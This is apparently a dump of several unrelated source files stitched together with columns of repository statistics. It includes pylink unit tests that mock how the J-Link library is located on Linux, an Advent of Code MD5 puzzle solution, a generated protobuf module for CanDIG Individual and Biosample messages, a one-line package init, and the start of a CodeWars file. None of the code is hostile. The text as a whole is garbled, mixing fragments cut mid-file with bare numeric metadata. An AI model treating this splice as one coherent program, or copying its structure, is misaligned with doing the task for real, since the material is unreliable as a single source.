    mock_find_library.assert_called_once_with(library.Library.WINDOWS_JLINK_SDK_NAME)
    self.assertEqual(1, mock_find_library.call_count)
    self.assertEqual(1, mock_load_library.call_count)
@mock.patch('sys.platform', new='linux')
@mock.patch('pylink.util.is_os_64bit', return_value=False)
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_linux_4_98_e(self, mock_os, mock_load_library, mock_find_library, mock_open, mock_is_os_64bit):
    """Tests finding the DLL on Linux through the SEGGER application for V4.98E-.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_load_library (Mock): a mocked version of the library loader
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open()``
      mock_is_os_64bit (Mock): mock for the ``is_os_64bit`` call, returns False

    Returns:
      ``None``
    """
    mock_find_library.return_value = None
    directories = [
        '/opt/SEGGER/JLink_Linux_V498e_i386/libjlinkarm.so',
    ]
    self.mock_directories(mock_os, directories, '/')
    lib = library.Library()
    lib.unload = mock.Mock()
    # The original unpacked ``mock_load_library.call_args`` into unused
    # (and typo'd) locals, which only implicitly asserted the loader ran
    # (unpacking ``None`` would raise).  Assert that explicitly instead.
    mock_load_library.assert_called()
    self.assertEqual(directories[0], lib._path)
@mock.patch('sys.platform', new='linux2')
@mock.patch('pylink.util.is_os_64bit', return_value=False)
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_linux_6_10_0_32bit(self, mock_os, mock_load_library, mock_find_library, mock_open, mock_is_os_64bit):
    """Tests finding the DLL on Linux through the SEGGER application for V6.0.0+ on 32 bit linux.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_load_library (Mock): a mocked version of the library loader
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open()``
      mock_is_os_64bit (Mock): mock for mocking the call to ``is_os_64bit``, returns False

    Returns:
      ``None``
    """
    mock_find_library.return_value = None
    # Both the x86 and the plain .so are present: on 32-bit the x86
    # flavour must win.
    directories = [
        '/opt/SEGGER/JLink_Linux_V610d_x86_64/libjlinkarm_x86.so.6.10',
        '/opt/SEGGER/JLink_Linux_V610d_x86_64/libjlinkarm.so.6.10',
    ]
    self.mock_directories(mock_os, directories, '/')
    lib = library.Library()
    lib.unload = mock.Mock()
    # Replaces the original unused ``call_args`` unpack (typo'd locals),
    # which only implicitly asserted the loader was invoked.
    mock_load_library.assert_called()
    self.assertEqual(directories[0], lib._path)

    # With only the non-x86 .so available, a 32-bit host finds nothing.
    directories = [
        '/opt/SEGGER/JLink_Linux_V610d_x86_64/libjlinkarm.so.6.10',
    ]
    self.mock_directories(mock_os, directories, '/')
    lib = library.Library()
    lib.unload = mock.Mock()
    mock_load_library.assert_called()
    self.assertEqual(None, lib._path)
@mock.patch('sys.platform', new='linux2')
@mock.patch('pylink.util.is_os_64bit', return_value=True)
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_linux_6_10_0_64bit(self, mock_os, mock_load_library, mock_find_library, mock_open, mock_is_os_64bit):
    """Tests finding the DLL on Linux through the SEGGER application for V6.0.0+ on 64 bit linux.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_load_library (Mock): a mocked version of the library loader
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open()``
      mock_is_os_64bit (Mock): mock for mocking the call to ``is_os_64bit``, returns True

    Returns:
      ``None``
    """
    mock_find_library.return_value = None
    # Both flavours present: on 64-bit the non-x86 .so must be chosen.
    directories = [
        '/opt/SEGGER/JLink_Linux_V610d_x86_64/libjlinkarm_x86.so.6.10',
        '/opt/SEGGER/JLink_Linux_V610d_x86_64/libjlinkarm.so.6.10',
    ]
    self.mock_directories(mock_os, directories, '/')
    lib = library.Library()
    lib.unload = mock.Mock()
    # Replaces the original unused ``call_args`` unpack (typo'd locals),
    # which only implicitly asserted the loader was invoked.
    mock_load_library.assert_called()
    self.assertEqual(directories[1], lib._path)

    # Only the 32-bit x86 library exists, so a 64-bit host finds nothing.
    directories = [
        '/opt/SEGGER/JLink_Linux_V610d_x86_64/libjlinkarm_x86.so.6.10',
    ]
    self.mock_directories(mock_os, directories, '/')
    lib = library.Library()
    lib.unload = mock.Mock()
    self.assertEqual(None, lib._path)
@mock.patch('sys.platform', new='linux')
@mock.patch('pylink.library.open')
@mock.patch('os.remove', new=mock.Mock())
@mock.patch('tempfile.NamedTemporaryFile', new=mock.Mock())
@mock.patch('ctypes.util.find_library')
@mock.patch('ctypes.cdll.LoadLibrary')
@mock.patch('pylink.library.os')
def test_linux_empty(self, mock_os, mock_load_library, mock_find_library, mock_open):
    """Tests that no DLL is loaded on Linux when no SEGGER installation
    directories exist at all.

    Args:
      self (TestLibrary): the ``TestLibrary`` instance
      mock_os (Mock): a mocked version of the ``os`` module
      mock_load_library (Mock): a mocked version of the library loader
      mock_find_library (Mock): a mocked call to ``ctypes`` find library
      mock_open (Mock): mock for mocking the call to ``open()``

    Returns:
      ``None``
    """
    mock_find_library.return_value = None
    # An entirely empty filesystem view: nothing to discover.
    directories = []
    self.mock_directories(mock_os, directories, '/')
    lib = library.Library()
    lib.unload = mock.Mock()
    mock_find_library.assert_called_once_with(library.Library.JLINK_SDK_NAME)
    self.assertEqual(1, mock_find_library.call_count)
    # With nothing found, the loader must never be invoked.
    self.assertEqual(0, mock_load_library.call_count)
if __name__ == '__main__':
    # Allow the test suite to be run directly as a script.
    unittest.main()
| 37.496711
| 114
| 0.638945
| 4,320
| 34,197
| 4.857407
| 0.060648
| 0.070911
| 0.061475
| 0.045082
| 0.868328
| 0.857177
| 0.852078
| 0.844548
| 0.832634
| 0.823103
| 0
| 0.009163
| 0.24043
| 34,197
| 911
| 115
| 37.53787
| 0.798691
| 0.28716
| 0
| 0.727468
| 0
| 0
| 0.17308
| 0.106737
| 0
| 0
| 0.000892
| 0
| 0.16309
| 1
| 0.064378
| false
| 0.002146
| 0.008584
| 0
| 0.094421
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71085555d6931b7d2453196fa6d9288951c256f0
| 513
|
py
|
Python
|
2015/4.py
|
mathstrains21/Advent-Of-Code
|
c4a5365ecea87a9dfe52d936cbf80cac26f4ae8f
|
[
"MIT"
] | 3
|
2021-11-21T07:41:05.000Z
|
2021-11-22T02:47:59.000Z
|
2015/4.py
|
mathstrains21/Advent-Of-Code
|
c4a5365ecea87a9dfe52d936cbf80cac26f4ae8f
|
[
"MIT"
] | 2
|
2021-12-04T10:17:55.000Z
|
2021-12-04T10:21:31.000Z
|
2015/4.py
|
mathstrains21/Advent-Of-Code
|
c4a5365ecea87a9dfe52d936cbf80cac26f4ae8f
|
[
"MIT"
] | null | null | null |
import hashlib
def execute1(puzzle_input, zeroes=5):
    """Solve part one: mine the smallest positive integer suffix whose
    MD5 hash, taken over ``puzzle_input + suffix``, starts with a run of
    zero hex digits.

    Args:
        puzzle_input: the secret-key string prefixed to every candidate.
        zeroes: number of leading ``'0'`` hex digits required; defaults
            to 5, matching the original puzzle's behavior.

    Returns:
        The smallest positive integer producing a qualifying hash.
    """
    target = "0" * zeroes  # loop-invariant; hoisted out of the search
    number = 0
    while True:
        number += 1
        digest = hashlib.md5(f"{puzzle_input}{number}".encode()).hexdigest()
        if digest.startswith(target):
            return number
def execute2(puzzle_input, zeroes=6):
    """Solve part two: identical search to part one, but requiring a
    longer run of leading zero hex digits.

    Args:
        puzzle_input: the secret-key string prefixed to every candidate.
        zeroes: number of leading ``'0'`` hex digits required; defaults
            to 6, matching the original puzzle's behavior.

    Returns:
        The smallest positive integer producing a qualifying hash.
    """
    target = "0" * zeroes  # loop-invariant; hoisted out of the search
    number = 0
    while True:
        number += 1
        digest = hashlib.md5(f"{puzzle_input}{number}".encode()).hexdigest()
        if digest.startswith(target):
            return number
| 19.730769
| 59
| 0.477583
| 50
| 513
| 4.82
| 0.42
| 0.182573
| 0.282158
| 0.149378
| 0.746888
| 0.746888
| 0.746888
| 0.746888
| 0.746888
| 0.746888
| 0
| 0.039088
| 0.401559
| 513
| 25
| 60
| 20.52
| 0.745928
| 0
| 0
| 0.761905
| 0
| 0
| 0.089669
| 0.08577
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095238
| false
| 0
| 0.047619
| 0
| 0.238095
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
855ee2284dacbf09b67db3a646386d81803cb9de
| 22
|
py
|
Python
|
magma/passes/__init__.py
|
David-Durst/magma
|
425788b66c948a400d58dced3a40b9be596d4448
|
[
"MIT"
] | null | null | null |
magma/passes/__init__.py
|
David-Durst/magma
|
425788b66c948a400d58dced3a40b9be596d4448
|
[
"MIT"
] | null | null | null |
magma/passes/__init__.py
|
David-Durst/magma
|
425788b66c948a400d58dced3a40b9be596d4448
|
[
"MIT"
] | null | null | null |
from .passes import *
| 11
| 21
| 0.727273
| 3
| 22
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
85b1d5c705d490439856ace16e13b158c20ed652
| 19,467
|
py
|
Python
|
python/candig/schemas/candig/bio_metadata_pb2.py
|
ljdursi/ga4gh-schemas
|
8255e66d247e65688d0b5320173340f3eb52ce7c
|
[
"Apache-2.0"
] | 1
|
2019-12-06T14:06:37.000Z
|
2019-12-06T14:06:37.000Z
|
python/candig/schemas/candig/bio_metadata_pb2.py
|
ljdursi/ga4gh-schemas
|
8255e66d247e65688d0b5320173340f3eb52ce7c
|
[
"Apache-2.0"
] | 9
|
2019-03-25T22:35:49.000Z
|
2019-12-16T22:02:14.000Z
|
python/candig/schemas/candig/bio_metadata_pb2.py
|
ljdursi/ga4gh-schemas
|
8255e66d247e65688d0b5320173340f3eb52ce7c
|
[
"Apache-2.0"
] | 1
|
2017-12-04T17:29:14.000Z
|
2017-12-04T17:29:14.000Z
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: candig/schemas/candig/bio_metadata.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from candig.schemas.candig import common_pb2 as candig_dot_schemas_dot_candig_dot_common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='candig/schemas/candig/bio_metadata.proto',
package='candig.schemas.candig',
syntax='proto3',
serialized_pb=_b('\n(candig/schemas/candig/bio_metadata.proto\x12\x15\x63\x61ndig.schemas.candig\x1a\"candig/schemas/candig/common.proto\"\xc5\x04\n\nIndividual\x12\n\n\x02id\x18\x01 \x01(\t\x12\x12\n\ndataset_id\x18\x02 \x01(\t\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x04 \x01(\t\x12\x0f\n\x07\x63reated\x18\x05 \x01(\t\x12\x0f\n\x07updated\x18\x06 \x01(\t\x12\x34\n\x07species\x18\x07 \x01(\x0b\x32#.candig.schemas.candig.OntologyTerm\x12\x30\n\x03sex\x18\x08 \x01(\x0b\x32#.candig.schemas.candig.OntologyTerm\x12\x35\n\nattributes\x18\n \x01(\x0b\x32!.candig.schemas.candig.Attributes\x12\x12\n\npatient_id\x18\x0b \x01(\t\x12!\n\x19regional_profiling_centre\x18\x0c \x01(\t\x12\x36\n\tdiagnosis\x18\r \x01(\x0b\x32#.candig.schemas.candig.OntologyTerm\x12\x16\n\x0epathology_type\x18\x0e \x01(\t\x12 \n\x18\x65nrollment_approval_date\x18\x0f \x01(\t\x12$\n\x1c\x65nrollment_approval_initials\x18\x10 \x01(\t\x12\x1e\n\x16\x64\x61te_of_upload_to_sFTP\x18\x11 \x01(\t\x12\x32\n*tumor_board_presentation_date_and_analyses\x18\x12 \x01(\t\x12\x10\n\x08\x63omments\x18\x13 \x01(\t\"\xe3\x03\n\tBiosample\x12\n\n\x02id\x18\x01 \x01(\t\x12\x12\n\ndataset_id\x18\x02 \x01(\t\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\x13\n\x0b\x64\x65scription\x18\x04 \x01(\t\x12\x34\n\x07\x64isease\x18\x05 \x01(\x0b\x32#.candig.schemas.candig.OntologyTerm\x12\x0f\n\x07\x63reated\x18\x06 \x01(\t\x12\x0f\n\x07updated\x18\x07 \x01(\t\x12\x15\n\rindividual_id\x18\x08 \x01(\t\x12\x35\n\nattributes\x18\n \x01(\x0b\x32!.candig.schemas.candig.Attributes\x12@\n\x1cindividual_age_at_collection\x18\x0b \x01(\x0b\x32\x1a.candig.schemas.candig.Age\x12\x1f\n\x17\x65stimated_tumor_content\x18\x0c \x01(\t\x12\x1c\n\x14normal_sample_source\x18\r \x01(\t\x12\x13\n\x0b\x62iopsy_data\x18\x0e \x01(\t\x12$\n\x1ctumor_biopsy_anatomical_site\x18\x0f \x01(\t\x12\x13\n\x0b\x62iopsy_type\x18\x10 \x01(\t\x12\x1c\n\x14sample_shipment_date\x18\x11 \x01(\t\"J\n\x03\x41ge\x12\x0b\n\x03\x61ge\x18\x01 
\x01(\t\x12\x36\n\tage_class\x18\x02 \x01(\x0b\x32#.candig.schemas.candig.OntologyTermb\x06proto3')
,
dependencies=[candig_dot_schemas_dot_candig_dot_common__pb2.DESCRIPTOR,])
_INDIVIDUAL = _descriptor.Descriptor(
name='Individual',
full_name='candig.schemas.candig.Individual',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='candig.schemas.candig.Individual.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dataset_id', full_name='candig.schemas.candig.Individual.dataset_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='candig.schemas.candig.Individual.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='description', full_name='candig.schemas.candig.Individual.description', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='created', full_name='candig.schemas.candig.Individual.created', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='updated', full_name='candig.schemas.candig.Individual.updated', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='species', full_name='candig.schemas.candig.Individual.species', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sex', full_name='candig.schemas.candig.Individual.sex', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attributes', full_name='candig.schemas.candig.Individual.attributes', index=8,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='patient_id', full_name='candig.schemas.candig.Individual.patient_id', index=9,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='regional_profiling_centre', full_name='candig.schemas.candig.Individual.regional_profiling_centre', index=10,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='diagnosis', full_name='candig.schemas.candig.Individual.diagnosis', index=11,
number=13, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pathology_type', full_name='candig.schemas.candig.Individual.pathology_type', index=12,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='enrollment_approval_date', full_name='candig.schemas.candig.Individual.enrollment_approval_date', index=13,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='enrollment_approval_initials', full_name='candig.schemas.candig.Individual.enrollment_approval_initials', index=14,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='date_of_upload_to_sFTP', full_name='candig.schemas.candig.Individual.date_of_upload_to_sFTP', index=15,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tumor_board_presentation_date_and_analyses', full_name='candig.schemas.candig.Individual.tumor_board_presentation_date_and_analyses', index=16,
number=18, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='comments', full_name='candig.schemas.candig.Individual.comments', index=17,
number=19, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=104,
serialized_end=685,
)
_BIOSAMPLE = _descriptor.Descriptor(
name='Biosample',
full_name='candig.schemas.candig.Biosample',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='candig.schemas.candig.Biosample.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dataset_id', full_name='candig.schemas.candig.Biosample.dataset_id', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='candig.schemas.candig.Biosample.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='description', full_name='candig.schemas.candig.Biosample.description', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='disease', full_name='candig.schemas.candig.Biosample.disease', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='created', full_name='candig.schemas.candig.Biosample.created', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='updated', full_name='candig.schemas.candig.Biosample.updated', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='individual_id', full_name='candig.schemas.candig.Biosample.individual_id', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='attributes', full_name='candig.schemas.candig.Biosample.attributes', index=8,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='individual_age_at_collection', full_name='candig.schemas.candig.Biosample.individual_age_at_collection', index=9,
number=11, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='estimated_tumor_content', full_name='candig.schemas.candig.Biosample.estimated_tumor_content', index=10,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='normal_sample_source', full_name='candig.schemas.candig.Biosample.normal_sample_source', index=11,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='biopsy_data', full_name='candig.schemas.candig.Biosample.biopsy_data', index=12,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='tumor_biopsy_anatomical_site', full_name='candig.schemas.candig.Biosample.tumor_biopsy_anatomical_site', index=13,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='biopsy_type', full_name='candig.schemas.candig.Biosample.biopsy_type', index=14,
number=16, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='sample_shipment_date', full_name='candig.schemas.candig.Biosample.sample_shipment_date', index=15,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=688,
serialized_end=1171,
)
_AGE = _descriptor.Descriptor(
name='Age',
full_name='candig.schemas.candig.Age',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='age', full_name='candig.schemas.candig.Age.age', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='age_class', full_name='candig.schemas.candig.Age.age_class', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1173,
serialized_end=1247,
)
_INDIVIDUAL.fields_by_name['species'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ONTOLOGYTERM
_INDIVIDUAL.fields_by_name['sex'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ONTOLOGYTERM
_INDIVIDUAL.fields_by_name['attributes'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ATTRIBUTES
_INDIVIDUAL.fields_by_name['diagnosis'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ONTOLOGYTERM
_BIOSAMPLE.fields_by_name['disease'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ONTOLOGYTERM
_BIOSAMPLE.fields_by_name['attributes'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ATTRIBUTES
_BIOSAMPLE.fields_by_name['individual_age_at_collection'].message_type = _AGE
_AGE.fields_by_name['age_class'].message_type = candig_dot_schemas_dot_candig_dot_common__pb2._ONTOLOGYTERM
DESCRIPTOR.message_types_by_name['Individual'] = _INDIVIDUAL
DESCRIPTOR.message_types_by_name['Biosample'] = _BIOSAMPLE
DESCRIPTOR.message_types_by_name['Age'] = _AGE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
Individual = _reflection.GeneratedProtocolMessageType('Individual', (_message.Message,), dict(
DESCRIPTOR = _INDIVIDUAL,
__module__ = 'candig.schemas.candig.bio_metadata_pb2'
# @@protoc_insertion_point(class_scope:candig.schemas.candig.Individual)
))
_sym_db.RegisterMessage(Individual)
Biosample = _reflection.GeneratedProtocolMessageType('Biosample', (_message.Message,), dict(
DESCRIPTOR = _BIOSAMPLE,
__module__ = 'candig.schemas.candig.bio_metadata_pb2'
# @@protoc_insertion_point(class_scope:candig.schemas.candig.Biosample)
))
_sym_db.RegisterMessage(Biosample)
Age = _reflection.GeneratedProtocolMessageType('Age', (_message.Message,), dict(
DESCRIPTOR = _AGE,
__module__ = 'candig.schemas.candig.bio_metadata_pb2'
# @@protoc_insertion_point(class_scope:candig.schemas.candig.Age)
))
_sym_db.RegisterMessage(Age)
# @@protoc_insertion_point(module_scope)
| 50.043702
| 2,088
| 0.739611
| 2,702
| 19,467
| 5.048853
| 0.084012
| 0.065093
| 0.082173
| 0.067439
| 0.829497
| 0.792699
| 0.721962
| 0.693887
| 0.668304
| 0.661413
| 0
| 0.043611
| 0.126008
| 19,467
| 388
| 2,089
| 50.17268
| 0.758199
| 0.019674
| 0
| 0.714681
| 1
| 0.00277
| 0.24848
| 0.217761
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019391
| 0
| 0.019391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a419eed2463ef41dec0206b23b310ccd8621ee74
| 106
|
py
|
Python
|
CodeWars/Python/5 kyu/Scramblies/main.py
|
opastushkov/codewars-solutions
|
0132a24259a4e87f926048318332dcb4d94858ca
|
[
"MIT"
] | null | null | null |
CodeWars/Python/5 kyu/Scramblies/main.py
|
opastushkov/codewars-solutions
|
0132a24259a4e87f926048318332dcb4d94858ca
|
[
"MIT"
] | null | null | null |
CodeWars/Python/5 kyu/Scramblies/main.py
|
opastushkov/codewars-solutions
|
0132a24259a4e87f926048318332dcb4d94858ca
|
[
"MIT"
] | null | null | null |
